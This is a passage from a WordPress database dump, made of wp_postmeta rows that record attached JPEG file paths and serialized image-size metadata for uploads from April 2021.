(27961, 11428, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046432.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046432-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046432-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046432-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046432-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046432-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27962, 11429, '_wp_attached_file', '2021/04/07046431.jpg'),
(27963, 11429, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046431.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046431-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046431-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046431-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046431-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046431-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27964, 11430, '_wp_attached_file', '2021/04/07046430.jpg'),
(27965, 11430, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046430.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046430-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046430-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046430-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046430-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046430-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27966, 11431, '_wp_attached_file', '2021/04/07046429.jpg'),
(27967, 11431, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046429.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046429-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046429-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046429-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046429-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046429-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27968, 11432, '_wp_attached_file', '2021/04/07046428.jpg'),
(27969, 11432, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046428.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046428-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046428-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046428-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046428-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046428-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27970, 11433, '_wp_attached_file', '2021/04/07046427.jpg'),
(27971, 11433, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046427.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046427-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046427-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046427-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046427-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046427-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27972, 11434, '_wp_attached_file', '2021/04/07046426.jpg'),
(27973, 11434, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046426.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046426-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046426-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046426-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046426-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046426-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27974, 11435, '_wp_attached_file', '2021/04/07046425.jpg'),
(27975, 11435, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046425.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046425-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046425-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046425-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046425-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046425-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27976, 11436, '_wp_attached_file', '2021/04/07046424.jpg'),
(27977, 11436, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046424.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046424-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046424-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046424-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046424-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046424-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27978, 11437, '_wp_attached_file', '2021/04/07046423.jpg'),
(27979, 11437, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046423.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046423-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046423-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046423-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046423-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046423-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27980, 11438, '_wp_attached_file', '2021/04/07046422.jpg'),
(27981, 11438, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046422.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046422-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046422-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046422-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046422-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046422-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27982, 11439, '_wp_attached_file', '2021/04/07046421.jpg'),
(27983, 11439, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046421.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046421-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046421-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046421-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046421-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046421-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27984, 11440, '_wp_attached_file', '2021/04/07046420.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(27985, 11440, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046420.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046420-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046420-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046420-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046420-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046420-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27986, 11441, '_wp_attached_file', '2021/04/07046419.jpg'),
(27987, 11441, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046419.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046419-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046419-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046419-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046419-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046419-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27988, 11442, '_wp_attached_file', '2021/04/07046418.jpg'),
(27989, 11442, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046418.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046418-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046418-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046418-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046418-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046418-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27990, 11443, '_wp_attached_file', '2021/04/07046417.jpg'),
(27991, 11443, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046417.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046417-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046417-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046417-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046417-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046417-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27992, 11444, '_wp_attached_file', '2021/04/07046416.jpg'),
(27993, 11444, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046416.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046416-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046416-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046416-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046416-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046416-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0